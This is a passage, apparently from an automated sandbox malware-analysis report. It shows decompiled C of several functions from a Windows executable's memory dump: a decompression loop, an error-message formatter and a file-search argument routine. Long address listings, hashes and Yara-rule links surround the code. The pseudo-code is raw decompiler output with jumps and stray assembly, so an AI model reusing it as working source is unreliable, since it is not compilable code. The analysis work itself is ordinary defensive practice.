					asm("adc [0xf0b5a4], ebx");
					if(_t154 < 0 || _t154 <= 0 && _t113 < 0) {
						_t114 = E00ECA1D6(_t113, _t129);
					} else {
						_t114 =  *_t127;
						 *0xf0b598 =  &(_t127[1]);
					}
					_v415 = _t114;
					goto L26;
				} else {
					goto L2;
				}
				do {
					L2:
					_t110 = _t110 + _t117;
					_t149 = _t110;
					 *0xf0b5a0 = _t110;
					asm("adc [0xf0b5a4], ebx");
					if(_t149 < 0 || _t149 <= 0 && _t110 < 0) {
						_t115 = E00ECA1D6(_t110, _t129);
						_t119 =  *0xf0b598; // 0x31dc72d
						_t129 = _t115;
						_t110 =  *0xf0b5a0; // 0x116
					} else {
						_t129 =  *_t119 & 0x000000ff;
						_t119 =  &(_t119[1]);
						 *0xf0b598 = _t119;
					}
					 *(_t145 + _t138 + 0x28) = _t129;
					_t138 = _t138 + 1;
				} while (_t138 < _t136);
				goto L8;
			}























































                                                                                                                0x00eccd25
                                                                                                                0x00eccd25
                                                                                                                0x00eccd30
                                                                                                                0x00eccd34
                                                                                                                0x00eccd38
                                                                                                                0x00eccd3d
                                                                                                                0x00eccd43
                                                                                                                0x00eccd45
                                                                                                                0x00eccd47
                                                                                                                0x00eccd51
                                                                                                                0x00eccd52
                                                                                                                0x00ecce0d
                                                                                                                0x00ecce12
                                                                                                                0x00ecce12
                                                                                                                0x00ecce12
                                                                                                                0x00ecce14
                                                                                                                0x00ecce19
                                                                                                                0x00ecce1f
                                                                                                                0x00ecce33
                                                                                                                0x00ecce33
                                                                                                                0x00ecce38
                                                                                                                0x00ecce3e
                                                                                                                0x00ecce40
                                                                                                                0x00000000
                                                                                                                0x00ecce40
                                                                                                                0x00ecce21
                                                                                                                0x00ecce27
                                                                                                                0x00ecce27
                                                                                                                0x00ecce2a
                                                                                                                0x00ecce2b
                                                                                                                0x00000000
                                                                                                                0x00ecce2b
                                                                                                                0x00ecce23
                                                                                                                0x00ecce25
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ecce45
                                                                                                                0x00ecce45
                                                                                                                0x00ecce49
                                                                                                                0x00ecce4a
                                                                                                                0x00ecce4a
                                                                                                                0x00ecce4e
                                                                                                                0x00ecce4e
                                                                                                                0x00ecce53
                                                                                                                0x00ecce57
                                                                                                                0x00ecce63
                                                                                                                0x00ecce68
                                                                                                                0x00eccec6
                                                                                                                0x00eccecb
                                                                                                                0x00eccee9
                                                                                                                0x00eccef3
                                                                                                                0x00eccef4
                                                                                                                0x00eccf04
                                                                                                                0x00eccf05
                                                                                                                0x00eccf0d
                                                                                                                0x00eccf0e
                                                                                                                0x00eccfbe
                                                                                                                0x00eccfcd
                                                                                                                0x00eccfd2
                                                                                                                0x00eccfd4
                                                                                                                0x00eccfd7
                                                                                                                0x00eccfdb
                                                                                                                0x00eccfdd
                                                                                                                0x00ecd01d
                                                                                                                0x00ecd02a
                                                                                                                0x00ecd035
                                                                                                                0x00ecd03f
                                                                                                                0x00ecd075
                                                                                                                0x00ecd077
                                                                                                                0x00ecd077
                                                                                                                0x00ecd07e
                                                                                                                0x00ecd0d6
                                                                                                                0x00ecd0d6
                                                                                                                0x00ecd0d8
                                                                                                                0x00ecd0e2
                                                                                                                0x00ecd0e2
                                                                                                                0x00ecd080
                                                                                                                0x00ecd086
                                                                                                                0x00ecd08c
                                                                                                                0x00ecd08e
                                                                                                                0x00ecd09b
                                                                                                                0x00ecd09b
                                                                                                                0x00ecd09e
                                                                                                                0x00ecd0a4
                                                                                                                0x00ecd0a6
                                                                                                                0x00ecd0ac
                                                                                                                0x00ecd0b2
                                                                                                                0x00ecd0bf
                                                                                                                0x00ecd0bf
                                                                                                                0x00ecd0c1
                                                                                                                0x00ecd0c1
                                                                                                                0x00ecd0c3
                                                                                                                0x00ecd0d1
                                                                                                                0x00ecd0d1
                                                                                                                0x00000000
                                                                                                                0x00ecd0c3
                                                                                                                0x00ecd0b4
                                                                                                                0x00ecd0b9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ecd0bb
                                                                                                                0x00ecd0bd
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ecd0bd
                                                                                                                0x00ecd090
                                                                                                                0x00ecd097
                                                                                                                0x00ecd097
                                                                                                                0x00ecd069
                                                                                                                0x00ecd069
                                                                                                                0x00000000
                                                                                                                0x00ecd069
                                                                                                                0x00ecd092
                                                                                                                0x00ecd095
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ecd095
                                                                                                                0x00ecd043
                                                                                                                0x00ecd048
                                                                                                                0x00ecd04f
                                                                                                                0x00ecd054
                                                                                                                0x00ecd059
                                                                                                                0x00ecd06c
                                                                                                                0x00ecd06e
                                                                                                                0x00000000
                                                                                                                0x00ecd06e
                                                                                                                0x00ecd05b
                                                                                                                0x00ecd05d
                                                                                                                0x00000000
                                                                                                                0x00ecd05d
                                                                                                                0x00eccfe7
                                                                                                                0x00eccfee
                                                                                                                0x00eccff0
                                                                                                                0x00eccff2
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ecd002
                                                                                                                0x00ecd011
                                                                                                                0x00ecd016
                                                                                                                0x00ecd018
                                                                                                                0x00000000
                                                                                                                0x00ecd018
                                                                                                                0x00eccf14
                                                                                                                0x00eccf33
                                                                                                                0x00eccf44
                                                                                                                0x00eccf49
                                                                                                                0x00eccf4e
                                                                                                                0x00eccf51
                                                                                                                0x00eccf57
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00eccf65
                                                                                                                0x00eccf6c
                                                                                                                0x00eccf70
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00eccf84
                                                                                                                0x00eccfa3
                                                                                                                0x00eccfb4
                                                                                                                0x00eccfb9
                                                                                                                0x00000000
                                                                                                                0x00eccfb9
                                                                                                                0x00ecd067
                                                                                                                0x00000000
                                                                                                                0x00ecd067
                                                                                                                0x00ecce6a
                                                                                                                0x00ecce78
                                                                                                                0x00ecce96
                                                                                                                0x00ecce9d
                                                                                                                0x00ecceaf
                                                                                                                0x00ecceaf
                                                                                                                0x00ecceb4
                                                                                                                0x00eccebd
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00eccebf
                                                                                                                0x00eccebf
                                                                                                                0x00000000
                                                                                                                0x00eccebf
                                                                                                                0x00eccea1
                                                                                                                0x00eccea6
                                                                                                                0x00eccead
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00eccead
                                                                                                                0x00ecce81
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ecce85
                                                                                                                0x00ecce8b
                                                                                                                0x00ecce8b
                                                                                                                0x00ecce8d
                                                                                                                0x00ecce8f
                                                                                                                0x00000000
                                                                                                                0x00ecce8f
                                                                                                                0x00eccd58
                                                                                                                0x00eccd60
                                                                                                                0x00eccd67
                                                                                                                0x00eccd6e
                                                                                                                0x00eccdac
                                                                                                                0x00eccdac
                                                                                                                0x00eccdac
                                                                                                                0x00eccdae
                                                                                                                0x00eccdb3
                                                                                                                0x00eccdb9
                                                                                                                0x00eccdcc
                                                                                                                0x00eccdd1
                                                                                                                0x00eccdd7
                                                                                                                0x00eccdd9
                                                                                                                0x00eccdc1
                                                                                                                0x00eccdc1
                                                                                                                0x00eccdc3
                                                                                                                0x00eccdc4
                                                                                                                0x00eccdc4
                                                                                                                0x00eccdde
                                                                                                                0x00eccdde
                                                                                                                0x00eccde0
                                                                                                                0x00eccde4
                                                                                                                0x00eccde9
                                                                                                                0x00eccdef
                                                                                                                0x00ecce02
                                                                                                                0x00eccdf7
                                                                                                                0x00eccdf7
                                                                                                                0x00eccdfa
                                                                                                                0x00eccdfa
                                                                                                                0x00ecce07
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00eccd70
                                                                                                                0x00eccd70
                                                                                                                0x00eccd70
                                                                                                                0x00eccd70
                                                                                                                0x00eccd72
                                                                                                                0x00eccd77
                                                                                                                0x00eccd7d
                                                                                                                0x00eccd91
                                                                                                                0x00eccd96
                                                                                                                0x00eccd9c
                                                                                                                0x00eccd9e
                                                                                                                0x00eccd85
                                                                                                                0x00eccd85
                                                                                                                0x00eccd88
                                                                                                                0x00eccd89
                                                                                                                0x00eccd89
                                                                                                                0x00eccda3
                                                                                                                0x00eccda7
                                                                                                                0x00eccda8
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _memcmp
                                                                                                                • String ID: SSSS.exe
                                                                                                                • API String ID: 2931989736-2379260107
                                                                                                                • Opcode ID: 2cbe2ab8e3ba8af5b6855068ee248a75603d49463ec3484f3be91972aac5dc0e
                                                                                                                • Instruction ID: e88a9e96adc8004a264603c15ffbd5d8e190c5e7924cf01fb082bd2651da5d9a
                                                                                                                • Opcode Fuzzy Hash: 2cbe2ab8e3ba8af5b6855068ee248a75603d49463ec3484f3be91972aac5dc0e
                                                                                                                • Instruction Fuzzy Hash: 9CA137725082489ED311DB24DE41FB77BEABB86304F1C216EF588E2192D773840BEB52
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EC721D, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 17%
                                                                                                                			E00EC721D(intOrPtr* __ecx) {
				char _v516;
				signed int _t26;
				void* _t28;
				void* _t32;
				signed int _t33;
				signed int _t34;
				signed int _t35;
				signed int _t38;
				void* _t47;
				void* _t48;

				_t41 = __ecx;
				_t44 = __ecx;
				_t26 =  *(__ecx + 0x48);
				_t47 = _t26 - 0x6f;
				if(_t47 > 0) {
					__eflags = _t26 - 0x7d;
					if(_t26 == 0x7d) {
						E00ED1F24();
						_t28 = E00EC4A3C(_t41, 0x96);
						return E00ECF2B3( *0xf0ca30, E00EC4A3C(_t41, 0xc9), _t28, 0);
					}
				} else {
					if(_t47 == 0) {
						_push(0x456);
						L38:
						_push(E00EC4A3C(_t41));
						_push( *_t44);
						L19:
						_t32 = E00ED0144();
						L11:
						return _t32;
					}
					_t48 = _t26 - 0x16;
					if(_t48 > 0) {
						__eflags = _t26 - 0x38;
						if(__eflags > 0) {
							_t33 = _t26 - 0x39;
							__eflags = _t33;
							if(_t33 == 0) {
								_push(0x8c);
								goto L38;
							}
							_t34 = _t33 - 1;
							__eflags = _t34;
							if(_t34 == 0) {
								_push(0x6f);
								goto L38;
							}
							_t35 = _t34 - 1;
							__eflags = _t35;
							if(_t35 == 0) {
								_push( *((intOrPtr*)(__ecx + 4)));
								_push(0x406);
								goto L13;
							}
							_t38 = _t35 - 9;
							__eflags = _t38;
							if(_t38 == 0) {
								_push(0x343);
								goto L38;
							}
							_t26 = _t38 - 1;
							__eflags = _t26;
							if(_t26 == 0) {
								_push(0x86);
								goto L38;
							}
						} else {
							if(__eflags == 0) {
								_push(0x67);
								goto L38;
							}
							_t26 = _t26 - 0x17;
							__eflags = _t26 - 0xb;
							if(_t26 <= 0xb) {
								switch( *((intOrPtr*)(_t26 * 4 +  &M00EC74E1))) {
									case 0:
										_push(0xde);
										goto L18;
									case 1:
										_push(0xe1);
										goto L18;
									case 2:
										_push(0xb4);
										goto L38;
									case 3:
										_push(0x69);
										goto L38;
									case 4:
										_push(0x6a);
										goto L38;
									case 5:
										_push( *((intOrPtr*)(__esi + 4)));
										_push(0x68);
										goto L13;
									case 6:
										_push(0x46f);
										goto L38;
									case 7:
										_push(0x470);
										goto L38;
									case 8:
										_push( *((intOrPtr*)(__esi + 4)));
										_push(0x471);
										goto L13;
									case 9:
										goto L61;
									case 0xa:
										_push( *((intOrPtr*)(__esi + 4)));
										_push(0x71);
										goto L13;
									case 0xb:
										E00EC4A3C(__ecx, 0xc8) =  &_v516;
										__eax = E00EC37E6( &_v516, 0x100,  &_v516,  *((intOrPtr*)(__esi + 4)));
										_push( *((intOrPtr*)(__esi + 8)));
										__eax =  &_v516;
										_push( &_v516);
										return E00ED0144( *__esi, L"%s: %s");
								}
							}
						}
					} else {
						if(_t48 == 0) {
							_push( *__ecx);
							_push(0xdd);
							L23:
							E00EC4A3C(_t41);
							L7:
							_push(0);
							L8:
							return E00ED0144();
						}
						if(_t26 <= 0x15) {
							switch( *((intOrPtr*)(_t26 * 4 +  &M00EC7489))) {
								case 0:
									_push( *__esi);
									_push(L"%ls");
									_push(">");
									goto L8;
								case 1:
									_push( *__ecx);
									_push(L"%ls");
									goto L7;
								case 2:
									_push(0);
									__eax = E00ECF8B2();
									goto L11;
								case 3:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x7b);
									goto L13;
								case 4:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x7a);
									goto L13;
								case 5:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x7c);
									goto L13;
								case 6:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0xca);
									goto L13;
								case 7:
									_push(0x70);
									L18:
									_push(E00EC4A3C(_t41));
									_push(0);
									goto L19;
								case 8:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x72);
									goto L13;
								case 9:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x78);
									goto L13;
								case 0xa:
									_push( *__esi);
									_push(0x85);
									goto L23;
								case 0xb:
									_push( *__esi);
									_push(0x204);
									goto L23;
								case 0xc:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x84);
									goto L13;
								case 0xd:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x83);
									goto L13;
								case 0xe:
									goto L61;
								case 0xf:
									_push( *((intOrPtr*)(__esi + 8)));
									_push( *((intOrPtr*)(__esi + 4)));
									__eax = E00EC4A3C(__ecx, 0xd2);
									return __eax;
								case 0x10:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x79);
									goto L13;
								case 0x11:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0xdc);
									L13:
									_push(E00EC4A3C(_t41));
									_push( *_t44);
									goto L8;
							}
						}
					}
				}
				L61:
				return _t26;
			}













                                                                                                                0x00ec721d
                                                                                                                0x00ec7227
                                                                                                                0x00ec7229
                                                                                                                0x00ec722c
                                                                                                                0x00ec722f
                                                                                                                0x00ec7456
                                                                                                                0x00ec7459
                                                                                                                0x00ec745b
                                                                                                                0x00ec7467
                                                                                                                0x00000000
                                                                                                                0x00ec747e
                                                                                                                0x00ec7235
                                                                                                                0x00ec7235
                                                                                                                0x00ec744c
                                                                                                                0x00ec7379
                                                                                                                0x00ec737e
                                                                                                                0x00ec737f
                                                                                                                0x00ec72bc
                                                                                                                0x00ec72bc
                                                                                                                0x00ec7285
                                                                                                                0x00000000
                                                                                                                0x00ec7285
                                                                                                                0x00ec723b
                                                                                                                0x00ec723e
                                                                                                                0x00ec733e
                                                                                                                0x00ec7341
                                                                                                                0x00ec7401
                                                                                                                0x00ec7401
                                                                                                                0x00ec7404
                                                                                                                0x00ec7442
                                                                                                                0x00000000
                                                                                                                0x00ec7442
                                                                                                                0x00ec7406
                                                                                                                0x00ec7406
                                                                                                                0x00ec7409
                                                                                                                0x00ec743b
                                                                                                                0x00000000
                                                                                                                0x00ec743b
                                                                                                                0x00ec740b
                                                                                                                0x00ec740b
                                                                                                                0x00ec740e
                                                                                                                0x00ec742e
                                                                                                                0x00ec7431
                                                                                                                0x00000000
                                                                                                                0x00ec7431
                                                                                                                0x00ec7410
                                                                                                                0x00ec7410
                                                                                                                0x00ec7413
                                                                                                                0x00ec7424
                                                                                                                0x00000000
                                                                                                                0x00ec7424
                                                                                                                0x00ec7415
                                                                                                                0x00ec7415
                                                                                                                0x00ec7418
                                                                                                                0x00ec741a
                                                                                                                0x00000000
                                                                                                                0x00ec741a
                                                                                                                0x00ec7347
                                                                                                                0x00ec7347
                                                                                                                0x00ec73fa
                                                                                                                0x00000000
                                                                                                                0x00ec73fa
                                                                                                                0x00ec734d
                                                                                                                0x00ec7350
                                                                                                                0x00ec7353
                                                                                                                0x00ec7359
                                                                                                                0x00000000
                                                                                                                0x00ec7360
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec736a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec7374
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec7386
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec738a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec738e
                                                                                                                0x00ec7391
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec7398
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec739f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec73a6
                                                                                                                0x00ec73a9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec73b3
                                                                                                                0x00ec73b6
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec73cb
                                                                                                                0x00ec73d7
                                                                                                                0x00ec73dc
                                                                                                                0x00ec73df
                                                                                                                0x00ec73e5
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec7359
                                                                                                                0x00ec7353
                                                                                                                0x00ec7244
                                                                                                                0x00ec7244
                                                                                                                0x00ec7335
                                                                                                                0x00ec7337
                                                                                                                0x00ec72d9
                                                                                                                0x00ec72d9
                                                                                                                0x00ec7261
                                                                                                                0x00ec7261
                                                                                                                0x00ec7263
                                                                                                                0x00000000
                                                                                                                0x00ec7268
                                                                                                                0x00ec724d
                                                                                                                0x00ec7253
                                                                                                                0x00000000
                                                                                                                0x00ec7270
                                                                                                                0x00ec7272
                                                                                                                0x00ec7277
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec725a
                                                                                                                0x00ec725c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec727e
                                                                                                                0x00ec7280
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec728b
                                                                                                                0x00ec728e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec729a
                                                                                                                0x00ec729d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec72a1
                                                                                                                0x00ec72a4
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec72a8
                                                                                                                0x00ec72ab
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec72b2
                                                                                                                0x00ec72b4
                                                                                                                0x00ec72b9
                                                                                                                0x00ec72ba
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec72c4
                                                                                                                0x00ec72c7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec72cb
                                                                                                                0x00ec72ce
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec72d2
                                                                                                                0x00ec72d4
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec72e1
                                                                                                                0x00ec72e3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec72ea
                                                                                                                0x00ec72ed
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec72f4
                                                                                                                0x00ec72f7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec72fe
                                                                                                                0x00ec7301
                                                                                                                0x00ec7309
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec731e
                                                                                                                0x00ec7321
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec7328
                                                                                                                0x00ec732b
                                                                                                                0x00ec7290
                                                                                                                0x00ec7295
                                                                                                                0x00ec7296
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec7253
                                                                                                                0x00ec724d
                                                                                                                0x00ec723e
                                                                                                                0x00ec7487
                                                                                                                0x00ec7487

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _swprintf
                                                                                                                • String ID: %ls$%s: %s
                                                                                                                • API String ID: 589789837-2259941744
                                                                                                                • Opcode ID: c73af6b19aa03aa85e72c5b493d0cfc6fe7fef0fca04487aa1e84adcab33587c
                                                                                                                • Instruction ID: d47f9694b6e12d9dee1b57a812cfec92248bc34ee57040830362168f489d141c
                                                                                                                • Opcode Fuzzy Hash: c73af6b19aa03aa85e72c5b493d0cfc6fe7fef0fca04487aa1e84adcab33587c
                                                                                                                • Instruction Fuzzy Hash: 40511B7568C305FAE6291A948F02F767E96AB04B00F24750EF7DAB40F2D5A398137F16
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EDF9E8, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 72%
                                                                                                                			E00EDF9E8(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				char _v6;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v36;
				intOrPtr* _v64;
				intOrPtr _v96;
				intOrPtr* _v100;
				CHAR* _v104;
				signed int _v116;
				char _v290;
				signed int _v291;
				struct _WIN32_FIND_DATAA _v336;
				union _FINDEX_INFO_LEVELS _v340;
				signed int _v344;
				signed int _v348;
				intOrPtr _v440;
				intOrPtr* _t80;
				signed int _t82;
				signed int _t87;
				signed int _t91;
				signed int _t93;
				signed int _t95;
				signed int _t96;
				signed int _t100;
				signed int _t103;
				signed int _t108;
				signed int _t111;
				intOrPtr _t113;
				signed char _t115;
				union _FINDEX_INFO_LEVELS _t123;
				signed int _t128;
				signed int _t131;
				void* _t137;
				void* _t139;
				signed int _t140;
				signed int _t143;
				signed int _t145;
				signed int _t147;
				signed int* _t148;
				signed int _t151;
				void* _t154;
				CHAR* _t155;
				char _t158;
				char _t160;
				intOrPtr* _t163;
				void* _t164;
				intOrPtr* _t165;
				signed int _t167;
				void* _t169;
				intOrPtr* _t170;
				signed int _t174;
				signed int _t178;
				signed int _t179;
				intOrPtr* _t184;
				void* _t193;
				intOrPtr _t194;
				signed int _t196;
				signed int _t197;
				signed int _t199;
				signed int _t200;
				signed int _t202;
				union _FINDEX_INFO_LEVELS _t203;
				signed int _t208;
				signed int _t210;
				signed int _t211;
				void* _t213;
				intOrPtr _t214;
				void* _t215;
				signed int _t219;
				void* _t221;
				signed int _t222;
				void* _t223;
				void* _t224;
				void* _t225;
				signed int _t226;
				void* _t227;
				void* _t228;

				_t80 = _a8;
				_t224 = _t223 - 0x20;
				if(_t80 != 0) {
					_t208 = _a4;
					_t160 = 0;
					 *_t80 = 0;
					_t199 = 0;
					_t151 = 0;
					_v36 = 0;
					_v336.cAlternateFileName = 0;
					_v28 = 0;
					__eflags =  *_t208;
					if( *_t208 == 0) {
						L9:
						_v12 = _v12 & 0x00000000;
						_t82 = _t151 - _t199;
						_v8 = _t160;
						_t191 = (_t82 >> 2) + 1;
						__eflags = _t151 - _t199;
						_v16 = (_t82 >> 2) + 1;
						asm("sbb esi, esi");
						_t210 =  !_t208 & _t82 + 0x00000003 >> 0x00000002;
						__eflags = _t210;
						if(_t210 != 0) {
							_t197 = _t199;
							_t158 = _t160;
							do {
								_t184 =  *_t197;
								_t17 = _t184 + 1; // 0x1
								_v8 = _t17;
								do {
									_t143 =  *_t184;
									_t184 = _t184 + 1;
									__eflags = _t143;
								} while (_t143 != 0);
								_t158 = _t158 + 1 + _t184 - _v8;
								_t197 = _t197 + 4;
								_t145 = _v12 + 1;
								_v12 = _t145;
								__eflags = _t145 - _t210;
							} while (_t145 != _t210);
							_t191 = _v16;
							_v8 = _t158;
							_t151 = _v336.cAlternateFileName;
						}
						_t211 = E00EDC8DC(_t191, _v8, 1);
						_t225 = _t224 + 0xc;
						__eflags = _t211;
						if(_t211 != 0) {
							_t87 = _t211 + _v16 * 4;
							_v20 = _t87;
							_t192 = _t87;
							_v16 = _t87;
							__eflags = _t199 - _t151;
							if(_t199 == _t151) {
								L23:
								_t200 = 0;
								__eflags = 0;
								 *_a8 = _t211;
								goto L24;
							} else {
								_t93 = _t211 - _t199;
								__eflags = _t93;
								_v24 = _t93;
								do {
									_t163 =  *_t199;
									_v12 = _t163 + 1;
									do {
										_t95 =  *_t163;
										_t163 = _t163 + 1;
										__eflags = _t95;
									} while (_t95 != 0);
									_t164 = _t163 - _v12;
									_t35 = _t164 + 1; // 0x1
									_t96 = _t35;
									_push(_t96);
									_v12 = _t96;
									_t100 = E00EE3932(_t164, _t192, _v20 - _t192 + _v8,  *_t199);
									_t225 = _t225 + 0x10;
									__eflags = _t100;
									if(_t100 != 0) {
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										E00EDD8AC();
										asm("int3");
										_t221 = _t225;
										_push(_t164);
										_t165 = _v64;
										_t47 = _t165 + 1; // 0x1
										_t193 = _t47;
										do {
											_t103 =  *_t165;
											_t165 = _t165 + 1;
											__eflags = _t103;
										} while (_t103 != 0);
										_push(_t199);
										_t202 = _a8;
										_t167 = _t165 - _t193 + 1;
										_v12 = _t167;
										__eflags = _t167 - (_t103 | 0xffffffff) - _t202;
										if(_t167 <= (_t103 | 0xffffffff) - _t202) {
											_push(_t151);
											_t50 = _t202 + 1; // 0x1
											_t154 = _t50 + _t167;
											_t213 = E00EDD675(_t167, _t154, 1);
											_t169 = _t211;
											__eflags = _t202;
											if(_t202 == 0) {
												L34:
												_push(_v12);
												_t154 = _t154 - _t202;
												_t108 = E00EE3932(_t169, _t213 + _t202, _t154, _v0);
												_t226 = _t225 + 0x10;
												__eflags = _t108;
												if(__eflags != 0) {
													goto L37;
												} else {
													_t137 = E00EDFDB7(_a12, __eflags, _t213);
													E00EDD5AA(0);
													_t139 = _t137;
													goto L36;
												}
											} else {
												_push(_t202);
												_t140 = E00EE3932(_t169, _t213, _t154, _a4);
												_t226 = _t225 + 0x10;
												__eflags = _t140;
												if(_t140 != 0) {
													L37:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E00EDD8AC();
													asm("int3");
													_push(_t221);
													_t222 = _t226;
													_t227 = _t226 - 0x150;
													_t111 =  *0xef1558; // 0xf529bb33
													_v116 = _t111 ^ _t222;
													_t170 = _v100;
													_push(_t154);
													_t155 = _v104;
													_push(_t213);
													_t214 = _v96;
													_push(_t202);
													_v440 = _t214;
													while(1) {
														__eflags = _t170 - _t155;
														if(_t170 == _t155) {
															break;
														}
														_t113 =  *_t170;
														__eflags = _t113 - 0x2f;
														if(_t113 != 0x2f) {
															__eflags = _t113 - 0x5c;
															if(_t113 != 0x5c) {
																__eflags = _t113 - 0x3a;
																if(_t113 != 0x3a) {
																	_t170 = E00EE3980(_t155, _t170);
																	continue;
																}
															}
														}
														break;
													}
													_t194 =  *_t170;
													__eflags = _t194 - 0x3a;
													if(_t194 != 0x3a) {
														L47:
														_t203 = 0;
														__eflags = _t194 - 0x2f;
														if(_t194 == 0x2f) {
															L51:
															_t115 = 1;
															__eflags = 1;
														} else {
															__eflags = _t194 - 0x5c;
															if(_t194 == 0x5c) {
																goto L51;
															} else {
																__eflags = _t194 - 0x3a;
																if(_t194 == 0x3a) {
																	goto L51;
																} else {
																	_t115 = 0;
																}
															}
														}
														asm("sbb eax, eax");
														_v344 =  ~(_t115 & 0x000000ff) & _t170 - _t155 + 0x00000001;
														E00ED4440(_t203,  &_v336, _t203, 0x140);
														_t228 = _t227 + 0xc;
														_t215 = FindFirstFileExA(_t155, _t203,  &_v336, _t203, _t203, _t203);
														_t123 = _v340;
														__eflags = _t215 - 0xffffffff;
														if(_t215 != 0xffffffff) {
